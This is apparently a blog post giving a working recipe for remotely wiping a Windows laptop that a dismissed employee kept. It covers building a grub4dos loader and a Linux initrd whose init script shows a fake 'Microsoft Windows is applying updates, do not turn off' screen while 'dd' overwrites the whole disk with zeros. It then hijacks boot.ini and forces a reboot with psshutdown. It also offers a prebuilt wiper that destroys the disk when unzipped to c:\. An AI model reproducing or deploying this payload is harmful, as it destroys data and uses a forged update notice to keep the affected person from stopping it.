Remote wipe for Windows clients

I've recently had this situation where an employee was fired, and then refused to return 'his' laptop to the company. I cannot break into his home to return the hardware. But at least, I can make sure the software volume licences are really removed from the hardware. I did this with my own, self-built remote wipe function.

How to do a remote wipe of a Windows client that you own? WARNING: DO NOT use this method on other people's computers! Don't ever do vandalism, just use this to protect your data from thieves.

Prebuilt software

Below is a manual on creating software to wipe a system. You may also download my prebuilt software. Unzipping this in the c:\ of your computer will wipe the harddisk.

Social solution for technical limitations

The bootsector of a harddrive is overwritten in a jiffy. But this can easily be restored with special tools. If you overwrite the whole harddisk, the data cannot be restored. But overwriting takes a lot of time.
If you're telling the thief "hey, i'm now overwriting the harddisk", he'll probably switch it off. So we need to scare the thief into not turning of the computer. I did this by printing a text "microsoft update being installed" and saying that the user should absolutely not switch off the computer.

Requirements

To build the software for a remote wipe, you need:

  • Administrator access to the stolen laptop
  • A virtual machine (like VMWare) to test it. An identical laptop would even be better, 'cause it has the exact same drivers.

Step 1. Build grub bootloader

You can build your own bootloader or use my grldr. Compiling on my x86_64 didn't work, use a 32 bit system (or fix the libs yourself)!

mkdir /tmp/bootloader
cd /tmp/bootloader
wget http://download.gna.org/grub4dos/grub4dos-0.4.4-src.zip
unzip grub4dos-0.4.4-src.zip
cd grub4dos-0.4.4
chmod +x configure build
vim stage2/boot.c
//edit line 298 and 960 and to scare the laptop thief into not switching off the computer.
make

In grub4dos-temp/grub4dos-0.4.4/ you'll find a file grldr. This is the grub bootloader. Copy it to the c:\ of the computer you want to wipe.

Step 2. Get yourself a linux kernel

I simply used the running CentOS kernel of my development machine, named /boot/vmlinuz-2.6.18-194.26.1.el5. I renamed this file to bzImage and copied it to the c:\ of the "victim".

Step 3. Make a initrd

With a regular Linux installation, all files are placed on a Linux (ext2, ext3, ext4, xfs or btrfs) partition. Unfortunately, we don't have such a partition. Thats why we put all tools in a initrd (initial ramdisk). We may need SATA drivers, so as a base we use the initrd associated with the kernel we use, which is /boot/initrd-2.6.18-194.26.1.el5.img

mkdir /tmp/initrd
cd /tmp/initrd
cat /boot/initrd-2.6.18-194.26.1.el5.img | gzip -d | cpio -id
cd bin
#Download a statically linked "dd" executable. (Or build it yourself)
wget https://www.geeklab.info/wp-content/uploads/2010/12/dd.zip
unzip dd.zip && rm dd.zip
cd ..

Now edit the file "init" to load all required drivers, make /dev nodes and finally wipe the system. My init file contains:

#!/bin/nash
echo
echo
# here I have 40 more echo's, like a "tput clear" without having the tput command
echo
echo
echo "Microsoft(TM) Windows(TM) is applying updates."
echo
echo
echo "Running pre-update checks:"
echo "- Windows kernel: OK"
echo "- Drivers: OK"
sleep 1
echo "- Diskspace: OK"
echo "- Disk fragmentation: Defragmentation required to continue"
sleep 1
echo " Defragmenting harddisk. This may take a while. Please wait..."
echo " WARNING: Do not turn off your computer to prevent damage"
echo ""
mount -t proc /proc /proc
mount -t sysfs /sys /sys
mount -o mode=0755 -t tmpfs /dev /dev
mkdir /dev/pts
mount -t devpts -o gid=5,mode=620 /dev/pts /dev/pts
mkdir /dev/shm
mkdir /dev/mapper
mknod /dev/null c 1 3
mknod /dev/zero c 1 5
mknod /dev/urandom c 1 9
mknod /dev/systty c 4 0
mknod /dev/tty c 5 0
mknod /dev/console c 5 1
mknod /dev/ptmx c 5 2
mknod /dev/rtc c 10 135
mknod /dev/tty0 c 4 0
mknod /dev/tty1 c 4 1
hotplug
mkblkdevs
insmod /lib/scsi_mod.ko
insmod /lib/libata.ko
#insmod /lib/sata_via.ko #or other drivers
mkblkdevs
dd if=/dev/zero of=/dev/?da #either sda or hda

Warning: You may need drivers to access the harddisk, for instance ahci.ko. Check the "victims" chipset and load the correct drivers.
Finally, merge the files to 1 initrd file: find ./ | cpio -H newc -o | gzip > /tmp/initrd.gz and copy it to c:\ of the "victim".

Step 4: menu.lst

Create a file named menu.lst and place it in c:\

default 0
timeout 0
title Installing update
kernel (hd0,0)/bzImage quiet
initrd (hd0,0)/initrd.gz

Step 5: boot.ini

The hidden system file c:\boot.ini contains information for the ntldr bootloader windows uses. Remove the system and hidden attributes. Then edit boot.ini to contain the following information:

[boot loader]
timeout=0
default=c:\grldr
[operating systems]
c:\grldr="MSWIN Updater service"

Step 6: Check

The c:\ of the "victim" now contains:
c:\grldr
c:\menu.lst
c:\bzImage
c:\initrd.gz
c:\boot.ini
Check that all files exist.

Step 7: Reboot

With psshutdown (part of microsoft's pstools) reboot the "victim": psshutdown \\computer -r -t 0. Don't wait for the "victim" to reboot his computer, he may not reboot it but suspend instead.

© GeekLabInfo Remote wipe for Windows clients is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info

1 Star2 Stars3 Stars4 Stars5 Stars (4 votes, average: 4.50 out of 5)
Loading...